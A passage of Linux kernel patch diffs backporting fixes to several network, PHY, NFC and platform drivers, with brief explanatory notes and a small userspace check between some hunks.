+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index 95f392ab96708..ce72d512eddf9 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -1448,8 +1448,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_VLAN_PRIO;
+ 			headers->vlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 
+ 		if (match.mask->vlan_tpid)
+@@ -1482,8 +1482,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_CVLAN_PRIO;
+ 			headers->cvlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 	}
+ 
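
be16_encode_bits(v, mask) derives the shift from the mask's lowest set bit, so VLAN_PRIO_SHIFT no longer needs to be kept in sync with VLAN_PRIO_MASK by hand. A userspace check that the two spellings agree, with htons() standing in for cpu_to_be16() and __builtin_ctz() deriving the shift:

#include <stdio.h>
#include <stdint.h>
#include <arpa/inet.h>

#define VLAN_PRIO_MASK  0xe000
#define VLAN_PRIO_SHIFT 13

int main(void)
{
    uint16_t prio = 5;
    /* open-coded form removed by the patch */
    uint16_t a = htons((uint16_t)((prio << VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK));
    /* what be16_encode_bits(prio, VLAN_PRIO_MASK) computes */
    uint16_t b = htons((uint16_t)((prio << __builtin_ctz(VLAN_PRIO_MASK)) & VLAN_PRIO_MASK));

    printf("0x%04x 0x%04x -> %s\n", a, b, a == b ? "match" : "differ");
    return 0;
}
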
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 7f0a64731c675..f6c45cf27caf4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -866,6 +866,9 @@ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf,
+ 			int slot);
+ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc);
+ 
++#define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
++#define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)
++
+ /* CN10K RVU */
+ int rvu_set_channels_base(struct rvu *rvu);
+ void rvu_program_channels(struct rvu *rvu);
+@@ -881,6 +884,8 @@ static inline void rvu_dbg_init(struct rvu *rvu) {}
+ static inline void rvu_dbg_exit(struct rvu *rvu) {}
+ #endif
+ 
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr);
++
+ /* RVU Switch */
+ void rvu_switch_enable(struct rvu *rvu);
+ void rvu_switch_disable(struct rvu *rvu);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index fa280ebd3052b..26cfa501f1a11 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -198,9 +198,6 @@ enum cpt_eng_type {
+ 	CPT_IE_TYPE = 3,
+ };
+ 
+-#define NDC_MAX_BANK(rvu, blk_addr) (rvu_read64(rvu, \
+-						blk_addr, NDC_AF_CONST) & 0xFF)
+-
+ #define rvu_dbg_NULL NULL
+ #define rvu_dbg_open_NULL NULL
+ 
+@@ -1448,6 +1445,7 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 	struct nix_hw *nix_hw;
+ 	struct rvu *rvu;
+ 	int bank, max_bank;
++	u64 ndc_af_const;
+ 
+ 	if (blk_addr == BLKADDR_NDC_NPA0) {
+ 		rvu = s->private;
+@@ -1456,7 +1454,8 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 		rvu = nix_hw->rvu;
+ 	}
+ 
+-	max_bank = NDC_MAX_BANK(rvu, blk_addr);
++	ndc_af_const = rvu_read64(rvu, blk_addr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
+ 	for (bank = 0; bank < max_bank; bank++) {
+ 		seq_printf(s, "BANK:%d\n", bank);
+ 		seq_printf(s, "\tHits:\t%lld\n",
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 6b8747ebc08c6..bcce42cd1c240 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -790,6 +790,7 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 	struct nix_aq_res_s *result;
+ 	int timeout = 1000;
+ 	u64 reg, head;
++	int ret;
+ 
+ 	result = (struct nix_aq_res_s *)aq->res->base;
+ 
+@@ -813,9 +814,22 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NIX_AQ_COMP_GOOD)
++	if (result->compcode != NIX_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NIX_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NIX_AQ_COMP_LOCKERR ||
++		    result->compcode == NIX_AQ_COMP_CTX_POISON) {
++			ret = rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_TX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_TX);
++			if (ret)
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+index 70bd036ed76e4..4f5ca5ab13a40 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+@@ -4,7 +4,7 @@
+  * Copyright (C) 2018 Marvell.
+  *
+  */
+-
++#include <linux/bitfield.h>
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ 
+@@ -42,9 +42,18 @@ static int npa_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NPA_AQ_COMP_GOOD)
++	if (result->compcode != NPA_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NPA_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NPA_AQ_COMP_LOCKERR ||
++		    result->compcode == NPA_AQ_COMP_CTX_POISON) {
++			if (rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NPA0))
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+@@ -545,3 +554,48 @@ void rvu_npa_lf_teardown(struct rvu *rvu, u16 pcifunc, int npalf)
+ 
+ 	npa_ctx_free(rvu, pfvf);
+ }
++
++/* Due to a hardware erratum, in some corner cases, AQ context lock
++ * operations can result in an NDC way getting into an illegal state
++ * of not valid but locked.
++ *
++ * This API solves the problem by clearing the lock bit of the NDC block.
++ * The operation needs to be done for each line of all the NDC banks.
++ */
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr)
++{
++	int bank, max_bank, line, max_line, err;
++	u64 reg, ndc_af_const;
++
++	/* Set the ENABLE bit(63) to '0' */
++	reg = rvu_read64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL);
++	rvu_write64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, reg & GENMASK_ULL(62, 0));
++
++	/* Poll until the BUSY bits(47:32) are set to '0' */
++	err = rvu_poll_reg(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, GENMASK_ULL(47, 32), true);
++	if (err) {
++		dev_err(rvu->dev, "Timed out while polling for NDC CAM busy bits.\n");
++		return err;
++	}
++
++	ndc_af_const = rvu_read64(rvu, blkaddr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
++	max_line = FIELD_GET(NDC_AF_BANK_LINE_MASK, ndc_af_const);
++	for (bank = 0; bank < max_bank; bank++) {
++		for (line = 0; line < max_line; line++) {
++			/* Check if 'cache line valid bit(63)' is not set
++			 * but 'cache line lock bit(60)' is set; if so,
++			 * clear the lock bit(60).
++			 */
++			reg = rvu_read64(rvu, blkaddr,
++					 NDC_AF_BANKX_LINEX_METADATA(bank, line));
++			if (!(reg & BIT_ULL(63)) && (reg & BIT_ULL(60))) {
++				rvu_write64(rvu, blkaddr,
++					    NDC_AF_BANKX_LINEX_METADATA(bank, line),
++					    reg & ~BIT_ULL(60));
++			}
++		}
++	}
++
++	return 0;
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+index 0e0d536645ac7..39f7a7cb27558 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+@@ -690,6 +690,7 @@
+ #define NDC_AF_INTR_ENA_W1S		(0x00068)
+ #define NDC_AF_INTR_ENA_W1C		(0x00070)
+ #define NDC_AF_ACTIVE_PC		(0x00078)
++#define NDC_AF_CAMS_RD_INTERVAL		(0x00080)
+ #define NDC_AF_BP_TEST_ENABLE		(0x001F8)
+ #define NDC_AF_BP_TEST(a)		(0x00200 | (a) << 3)
+ #define NDC_AF_BLK_RST			(0x002F0)
+@@ -705,6 +706,8 @@
+ 		(0x00F00 | (a) << 5 | (b) << 4)
+ #define NDC_AF_BANKX_HIT_PC(a)		(0x01000 | (a) << 3)
+ #define NDC_AF_BANKX_MISS_PC(a)		(0x01100 | (a) << 3)
++#define NDC_AF_BANKX_LINEX_METADATA(a, b) \
++		(0x10000 | (a) << 12 | (b) << 3)
+ 
+ /* LBK */
+ #define LBK_CONST			(0x10ull)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index e3123723522e3..332329cb1ee00 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -566,7 +566,8 @@ static int mtk_mac_finish(struct phylink_config *config, unsigned int mode,
+ 	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 	mcr_new = mcr_cur;
+ 	mcr_new |= MAC_MCR_IPG_CFG | MAC_MCR_FORCE_MODE |
+-		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK;
++		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK |
++		   MAC_MCR_RX_FIFO_CLR_DIS;
+ 
+ 	/* Only update control register when needed! */
+ 	if (mcr_new != mcr_cur)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index 2d9186d32bc09..b481d0d46bb16 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -383,6 +383,7 @@
+ #define MAC_MCR_FORCE_MODE	BIT(15)
+ #define MAC_MCR_TX_EN		BIT(14)
+ #define MAC_MCR_RX_EN		BIT(13)
++#define MAC_MCR_RX_FIFO_CLR_DIS	BIT(12)
+ #define MAC_MCR_BACKOFF_EN	BIT(9)
+ #define MAC_MCR_BACKPR_EN	BIT(8)
+ #define MAC_MCR_FORCE_RX_FC	BIT(5)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+index a9aec900d608d..7d66fe75cd3bf 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+@@ -194,7 +194,7 @@ int lan966x_police_port_del(struct lan966x_port *port,
+ 		return -EINVAL;
+ 	}
+ 
+-	err = lan966x_police_del(port, port->tc.police_id);
++	err = lan966x_police_del(port, POL_IDX_PORT + port->chip_port);
+ 	if (err) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Failed to add policer to port");
+diff --git a/drivers/net/ethernet/netronome/nfp/nfd3/dp.c b/drivers/net/ethernet/netronome/nfp/nfd3/dp.c
+index 861082c5dbffb..ee2e442809c69 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfd3/dp.c
++++ b/drivers/net/ethernet/netronome/nfp/nfd3/dp.c
+@@ -327,14 +327,15 @@ netdev_tx_t nfp_nfd3_tx(struct sk_buff *skb, struct net_device *netdev)
+ 
+ 	/* Do not reorder - tso may adjust pkt cnt, vlan may override fields */
+ 	nfp_nfd3_tx_tso(r_vec, txbuf, txd, skb, md_bytes);
+-	nfp_nfd3_tx_csum(dp, r_vec, txbuf, txd, skb);
++	if (ipsec)
++		nfp_nfd3_ipsec_tx(txd, skb);
++	else
++		nfp_nfd3_tx_csum(dp, r_vec, txbuf, txd, skb);
+ 	if (skb_vlan_tag_present(skb) && dp->ctrl & NFP_NET_CFG_CTRL_TXVLAN) {
+ 		txd->flags |= NFD3_DESC_TX_VLAN;
+ 		txd->vlan = cpu_to_le16(skb_vlan_tag_get(skb));
+ 	}
+ 
+-	if (ipsec)
+-		nfp_nfd3_ipsec_tx(txd, skb);
+ 	/* Gather DMA */
+ 	if (nr_frags > 0) {
+ 		__le64 second_half;
+diff --git a/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c b/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c
+index e90f8c975903b..51087693072c2 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c
++++ b/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c
+@@ -10,9 +10,30 @@
+ void nfp_nfd3_ipsec_tx(struct nfp_nfd3_tx_desc *txd, struct sk_buff *skb)
+ {
+ 	struct xfrm_state *x = xfrm_input_state(skb);
++	struct xfrm_offload *xo = xfrm_offload(skb);
++	struct iphdr *iph = ip_hdr(skb);
++	int l4_proto;
+ 
+ 	if (x->xso.dev && (x->xso.dev->features & NETIF_F_HW_ESP_TX_CSUM)) {
+-		txd->flags |= NFD3_DESC_TX_CSUM | NFD3_DESC_TX_IP4_CSUM |
+-			      NFD3_DESC_TX_TCP_CSUM | NFD3_DESC_TX_UDP_CSUM;
++		txd->flags |= NFD3_DESC_TX_CSUM;
++
++		if (iph->version == 4)
++			txd->flags |= NFD3_DESC_TX_IP4_CSUM;
++
++		if (x->props.mode == XFRM_MODE_TRANSPORT)
++			l4_proto = xo->proto;
++		else if (x->props.mode == XFRM_MODE_TUNNEL)
++			l4_proto = xo->inner_ipproto;
++		else
++			return;
++
++		switch (l4_proto) {
++		case IPPROTO_UDP:
++			txd->flags |= NFD3_DESC_TX_UDP_CSUM;
++			return;
++		case IPPROTO_TCP:
++			txd->flags |= NFD3_DESC_TX_TCP_CSUM;
++			return;
++		}
+ 	}
+ }
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+index 70d7484c82af4..1182fa48a3b54 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
++++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+@@ -38,6 +38,7 @@
+ #include <net/tls.h>
+ #include <net/vxlan.h>
+ #include <net/xdp_sock_drv.h>
++#include <net/xfrm.h>
+ 
+ #include "nfpcore/nfp_dev.h"
+ #include "nfpcore/nfp_nsp.h"
+@@ -1897,6 +1898,9 @@ nfp_net_features_check(struct sk_buff *skb, struct net_device *dev,
+ 			features &= ~NETIF_F_GSO_MASK;
+ 	}
+ 
++	if (xfrm_offload(skb))
++		return features;
++
+ 	/* VXLAN/GRE check */
+ 	switch (vlan_get_protocol(skb)) {
+ 	case htons(ETH_P_IP):
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 1a5b8dab5e9b6..01f7e19a2ca8b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1170,6 +1170,7 @@ static int stmmac_init_phy(struct net_device *dev)
+ 
+ 		phylink_ethtool_get_wol(priv->phylink, &wol);
+ 		device_set_wakeup_capable(priv->device, !!wol.supported);
++		device_set_wakeup_enable(priv->device, !!wol.wolopts);
+ 	}
+ 
+ 	return ret;
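
device_set_wakeup_capable() only records that the device is able to wake the system; device_set_wakeup_enable() controls whether wakeup is actually armed. The stmmac fix adds the second call so the enable state tracks the WoL options currently programmed on the PHY. Roughly, mirroring the two lines above:

#include <linux/pm_wakeup.h>

/* wol as filled in by phylink_ethtool_get_wol() */
device_set_wakeup_capable(priv->device, !!wol.supported);	/* can it wake us?  */
device_set_wakeup_enable(priv->device, !!wol.wolopts);		/* is it armed now? */
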
+diff --git a/drivers/net/phy/microchip.c b/drivers/net/phy/microchip.c
+index ccecee2524ce6..0b88635f4fbca 100644
+--- a/drivers/net/phy/microchip.c
++++ b/drivers/net/phy/microchip.c
+@@ -342,6 +342,37 @@ static int lan88xx_config_aneg(struct phy_device *phydev)
+ 	return genphy_config_aneg(phydev);
+ }
+ 
++static void lan88xx_link_change_notify(struct phy_device *phydev)
++{
++	int temp;
++
++	/* In forced 100 F/H mode, the chip may fail to set the mode correctly
++	 * when the cable is switched between a long (~50+ m) and a short one.
++	 * As a workaround, set the speed to 10 before setting it to 100
++	 * in forced 100 F/H mode.
++	 */
++	if (!phydev->autoneg && phydev->speed == 100) {
++		/* disable phy interrupt */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++
++		temp = phy_read(phydev, MII_BMCR);
++		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
++		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
++		temp |= BMCR_SPEED100;
++		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
++
++		/* clear pending interrupt generated while workaround */
++		temp = phy_read(phydev, LAN88XX_INT_STS);
++
++		/* enable phy interrupt back */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++	}
++}
++
+ static struct phy_driver microchip_phy_driver[] = {
+ {
+ 	.phy_id		= 0x0007c132,
+@@ -359,6 +390,7 @@ static struct phy_driver microchip_phy_driver[] = {
+ 
+ 	.config_init	= lan88xx_config_init,
+ 	.config_aneg	= lan88xx_config_aneg,
++	.link_change_notify = lan88xx_link_change_notify,
+ 
+ 	.config_intr	= lan88xx_phy_config_intr,
+ 	.handle_interrupt = lan88xx_handle_interrupt,
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 607aa786c8cb4..cd246615b0f94 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3053,8 +3053,6 @@ static int phy_probe(struct device *dev)
+ 	if (phydrv->flags & PHY_IS_INTERNAL)
+ 		phydev->is_internal = true;
+ 
+-	mutex_lock(&phydev->lock);
+-
+ 	/* Deassert the reset signal */
+ 	phy_device_reset(phydev, 0);
+ 
+@@ -3122,12 +3120,10 @@ static int phy_probe(struct device *dev)
+ 	phydev->state = PHY_READY;
+ 
+ out:
+-	/* Assert the reset signal */
++	/* Re-assert the reset signal on error */
+ 	if (err)
+ 		phy_device_reset(phydev, 1);
+ 
+-	mutex_unlock(&phydev->lock);
+-
+ 	return err;
+ }
+ 
+@@ -3137,9 +3133,7 @@ static int phy_remove(struct device *dev)
+ 
+ 	cancel_delayed_work_sync(&phydev->state_queue);
+ 
+-	mutex_lock(&phydev->lock);
+ 	phydev->state = PHY_DOWN;
+-	mutex_unlock(&phydev->lock);
+ 
+ 	sfp_bus_del_upstream(phydev->sfp_bus);
+ 	phydev->sfp_bus = NULL;
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index ac7481ce2fc16..00d9eff91dcfa 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -44,7 +44,6 @@ static struct smsc_hw_stat smsc_hw_stats[] = {
+ };
+ 
+ struct smsc_phy_priv {
+-	u16 intmask;
+ 	bool energy_enable;
+ };
+ 
+@@ -57,7 +56,6 @@ static int smsc_phy_ack_interrupt(struct phy_device *phydev)
+ 
+ static int smsc_phy_config_intr(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int rc;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED) {
+@@ -65,14 +63,9 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 		if (rc)
+ 			return rc;
+ 
+-		priv->intmask = MII_LAN83C185_ISF_INT4 | MII_LAN83C185_ISF_INT6;
+-		if (priv->energy_enable)
+-			priv->intmask |= MII_LAN83C185_ISF_INT7;
+-
+-		rc = phy_write(phydev, MII_LAN83C185_IM, priv->intmask);
++		rc = phy_write(phydev, MII_LAN83C185_IM,
++			       MII_LAN83C185_ISF_INT_PHYLIB_EVENTS);
+ 	} else {
+-		priv->intmask = 0;
+-
+ 		rc = phy_write(phydev, MII_LAN83C185_IM, 0);
+ 		if (rc)
+ 			return rc;
+@@ -85,7 +78,6 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 
+ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int irq_status;
+ 
+ 	irq_status = phy_read(phydev, MII_LAN83C185_ISF);
+@@ -96,7 +88,7 @@ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ 		return IRQ_NONE;
+ 	}
+ 
+-	if (!(irq_status & priv->intmask))
++	if (!(irq_status & MII_LAN83C185_ISF_INT_PHYLIB_EVENTS))
+ 		return IRQ_NONE;
+ 
+ 	phy_trigger_machine(phydev);
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index f18ab8e220db7..068488890d57b 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -2115,33 +2115,8 @@ static void lan78xx_remove_mdio(struct lan78xx_net *dev)
+ static void lan78xx_link_status_change(struct net_device *net)
+ {
+ 	struct phy_device *phydev = net->phydev;
+-	int temp;
+-
+-	/* At forced 100 F/H mode, chip may fail to set mode correctly
+-	 * when cable is switched between long(~50+m) and short one.
+-	 * As workaround, set to 10 before setting to 100
+-	 * at forced 100 F/H mode.
+-	 */
+-	if (!phydev->autoneg && (phydev->speed == 100)) {
+-		/* disable phy interrupt */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+ 
+-		temp = phy_read(phydev, MII_BMCR);
+-		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
+-		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
+-		temp |= BMCR_SPEED100;
+-		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
+-
+-		/* clear pending interrupt generated while workaround */
+-		temp = phy_read(phydev, LAN88XX_INT_STS);
+-
+-		/* enable phy interrupt back */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+-	}
++	phy_print_status(phydev);
+ }
+ 
+ static int irq_map(struct irq_domain *d, unsigned int irq,
+diff --git a/drivers/nfc/fdp/i2c.c b/drivers/nfc/fdp/i2c.c
+index 2d53e0f88d2f9..1e0f2297f9c66 100644
+--- a/drivers/nfc/fdp/i2c.c
++++ b/drivers/nfc/fdp/i2c.c
+@@ -247,6 +247,9 @@ static void fdp_nci_i2c_read_device_properties(struct device *dev,
+ 					   len, sizeof(**fw_vsc_cfg),
+ 					   GFP_KERNEL);
+ 
++		if (!*fw_vsc_cfg)
++			goto alloc_err;
++
+ 		r = device_property_read_u8_array(dev, FDP_DP_FW_VSC_CFG_NAME,
+ 						  *fw_vsc_cfg, len);
+ 
+@@ -260,6 +263,7 @@ vsc_read_err:
+ 		*fw_vsc_cfg = NULL;
+ 	}
+ 
++alloc_err:
+ 	dev_dbg(dev, "Clock type: %d, clock frequency: %d, VSC: %s",
+ 		*clock_type, *clock_freq, *fw_vsc_cfg != NULL ? "yes" : "no");
+ }
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 09c7829e95c4b..382793e73a60a 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -16,17 +16,17 @@ if MELLANOX_PLATFORM
+ 
+ config MLXREG_HOTPLUG
+ 	tristate "Mellanox platform hotplug driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver handles hot-plug events for the power suppliers, power
+ 	  cables and fans on the wide range Mellanox IB and Ethernet systems.
+ 
+ config MLXREG_IO
+ 	tristate "Mellanox platform register access driver support"
+-	depends on REGMAP
+ 	depends on HWMON
++	select REGMAP
+ 	help
+ 	  This driver allows access to Mellanox programmable device register
+ 	  space through sysfs interface. The sets of registers for sysfs access
+@@ -36,9 +36,9 @@ config MLXREG_IO
+ 
+ config MLXREG_LC
+ 	tristate "Mellanox line card platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver provides support for the Mellanox MSN4800-XX line cards,
+ 	  which are the part of MSN4800 Ethernet modular switch systems
+@@ -80,10 +80,9 @@ config MLXBF_PMC
+ 
+ config NVSW_SN2201
+ 	tristate "Nvidia SN2201 platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
+-	depends on REGMAP_I2C
++	select REGMAP_I2C
+ 	help
+ 	  This driver provides support for the Nvidia SN2201 platform.
+ 	  The SN2201 is a highly integrated for one rack unit system with
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index 5692385e2d26f..1396a839dd8a4 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -956,7 +956,8 @@ config SERIAL_MULTI_INSTANTIATE
+ 
+ config MLX_PLATFORM
+ 	tristate "Mellanox Technologies platform support"
+-	depends on I2C && REGMAP
++	depends on I2C
++	select REGMAP
+ 	help
+ 	  This option enables system support for the Mellanox Technologies
+ 	  platform. The Mellanox systems provide data center networking
+diff --git a/drivers/platform/x86/dell/dell-wmi-ddv.c b/drivers/platform/x86/dell/dell-wmi-ddv.c
+index 9cb6ae42dbdc8..96fede24877f3 100644
+--- a/drivers/platform/x86/dell/dell-wmi-ddv.c
++++ b/drivers/platform/x86/dell/dell-wmi-ddv.c
+@@ -11,9 +11,9 @@
+ #include <linux/debugfs.h>
+ #include <linux/device.h>
+ #include <linux/dev_printk.h>
++#include <linux/errno.h>
+ #include <linux/kernel.h>
+ #include <linux/kstrtox.h>
+-#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/limits.h>
+ #include <linux/power_supply.h>
+@@ -125,21 +125,27 @@ static int dell_wmi_ddv_query_buffer(struct wmi_device *wdev, enum dell_ddv_meth
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (obj->package.count != 2)
+-		goto err_free;
++	if (obj->package.count != 2 ||
++	    obj->package.elements[0].type != ACPI_TYPE_INTEGER ||
++	    obj->package.elements[1].type != ACPI_TYPE_BUFFER) {
++		ret = -ENOMSG;
+ 
+-	if (obj->package.elements[0].type != ACPI_TYPE_INTEGER)
+ 		goto err_free;
++	}
+ 
+ 	buffer_size = obj->package.elements[0].integer.value;
+ 
+-	if (obj->package.elements[1].type != ACPI_TYPE_BUFFER)
++	if (!buffer_size) {
++		ret = -ENODATA;
++
+ 		goto err_free;
++	}
+ 
+ 	if (buffer_size > obj->package.elements[1].buffer.length) {
+ 		dev_warn(&wdev->dev,
+ 			 FW_WARN "WMI buffer size (%llu) exceeds ACPI buffer size (%d)\n",
+ 			 buffer_size, obj->package.elements[1].buffer.length);
